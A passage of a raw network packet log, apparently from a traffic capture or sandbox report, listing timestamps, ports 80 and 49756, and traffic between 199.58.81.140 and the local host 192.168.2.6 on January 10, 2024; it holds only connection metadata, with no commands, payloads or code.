Jan 10, 2024 15:41:31.345823050 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.346556902 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.346600056 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.346738100 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.346752882 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.346793890 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.346880913 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.346914053 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347053051 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347069025 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347080946 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347106934 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347127914 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347229958 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347244024 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347255945 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347268105 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347279072 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347281933 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347295046 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347306013 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347307920 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347322941 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347327948 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347336054 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347342014 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347349882 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347362041 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347366095 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347376108 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347381115 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347388983 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347402096 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347404003 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347417116 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347429991 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347429991 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347445011 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347457886 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347457886 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347470999 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347470999 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347485065 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347497940 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347501993 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347511053 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347524881 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347531080 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347537041 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347547054 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347553015 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347563982 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347568035 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347580910 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347592115 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347594023 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347606897 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347620010 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347620964 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347635031 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347637892 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347647905 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347661018 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347667933 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347673893 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347687960 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347696066 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347700119 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347709894 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347712040 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347732067 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347735882 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347748995 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347762108 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347762108 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347776890 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347786903 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347790956 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347803116 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347815037 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347816944 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347830057 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347842932 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347853899 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347877026 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347908974 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347944021 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.347944975 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.347996950 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.348053932 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.348093033 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.348207951 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.348246098 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.348277092 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.348309994 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.348330975 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.348351002 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.348381042 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.348417997 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.348448038 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.348484039 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.348535061 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.348571062 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.348716974 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.348753929 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.348934889 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.348970890 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.348974943 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.349024057 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.349045992 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.349093914 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.349095106 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.349138021 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.349270105 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.349308014 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.349339008 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.349368095 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.349375010 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.349401951 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.349469900 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.349508047 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.349524021 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.349558115 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.349589109 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.349625111 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.349656105 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.349692106 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.349781036 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.349817991 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.349834919 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.349872112 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.349968910 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.350008011 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.350060940 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.350101948 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.350131989 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.350168943 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.350184917 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.350219011 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.350250006 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.350287914 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.350366116 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.350402117 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.350436926 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.350474119 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.351078033 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.351120949 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.351150990 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.351288080 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.351325989 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.351356983 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.351399899 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.351437092 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.351465940 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.351500034 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.351520061 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.351582050 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.351615906 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.351634026 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.351682901 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.351721048 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.351761103 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.351798058 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.352387905 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.352432966 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.352475882 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.352507114 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.352579117 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.352617979 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.352617979 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.352662086 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.352682114 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.352778912 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.352826118 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.355019093 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.355201960 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.355256081 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.355560064 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.355632067 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.355671883 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.355803013 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.355896950 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.355954885 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.355986118 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.356023073 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.356070995 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.356142044 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.356179953 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.356251001 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.357577085 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.450378895 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.450726032 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.450742960 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.450757027 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.450804949 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.450808048 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.450848103 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.450944901 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.450995922 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.451086998 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.451145887 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.451191902 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.451196909 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.451241016 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.451282978 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.451299906 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.451344967 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.451364994 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.451390028 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.451420069 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.451462030 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.451493025 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.451534033 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.451550961 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.451592922 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.451605082 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.451647997 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.451678038 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.451719046 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.451749086 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.451788902 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.451797009 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.451841116 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.451942921 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.451987982 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.452028036 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.452070951 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.452107906 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.452151060 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.452166080 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.452205896 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.452215910 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.452258110 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.452260971 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.452289104 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.452331066 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.452348948 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.452414036 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.452455044 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.452461958 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.452507019 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.452512980 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.452563047 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.452604055 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.452635050 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.453145981 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.453198910 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.453290939 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.453336954 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.453932047 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.453984022 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.453994036 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.454022884 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.454092979 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.454092979 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.454098940 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.454138041 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.454139948 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.454175949 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.454206944 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.454246998 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.454268932 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.454296112 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.454320908 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.454363108 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.454513073 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.454560041 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.454569101 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.454618931 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.454663038 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.454694033 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.454735994 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.454735994 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.454796076 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.454830885 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.454840899 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.454874039 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.454893112 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.454941034 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.454982042 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.454986095 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.455322027 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.455372095 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.455385923 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.455426931 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.455457926 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.455495119 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.455538034 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.455701113 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.455769062 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.455812931 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.455815077 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.455909014 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.455952883 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.455981970 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.456022024 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.456279039 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.457541943 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.457597017 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.457601070 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.457638025 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.457655907 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.457735062 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.457778931 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.457840919 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.458070040 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.458084106 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.458096981 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.458110094 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.458129883 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.458141088 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.458158970 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.458297968 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.458339930 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.458383083 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.458415031 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.458425999 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.458465099 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.458492994 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.458508015 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.458553076 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.458623886 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.458636999 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.458683014 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.458688974 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.458731890 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.458749056 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.458790064 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.458800077 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.458841085 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.458846092 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.458887100 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.458916903 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.458957911 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.458997965 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.459038019 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.459055901 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.459100008 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.459101915 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.459141016 CET	49756	80	192.168.2.6	199.58.81.140
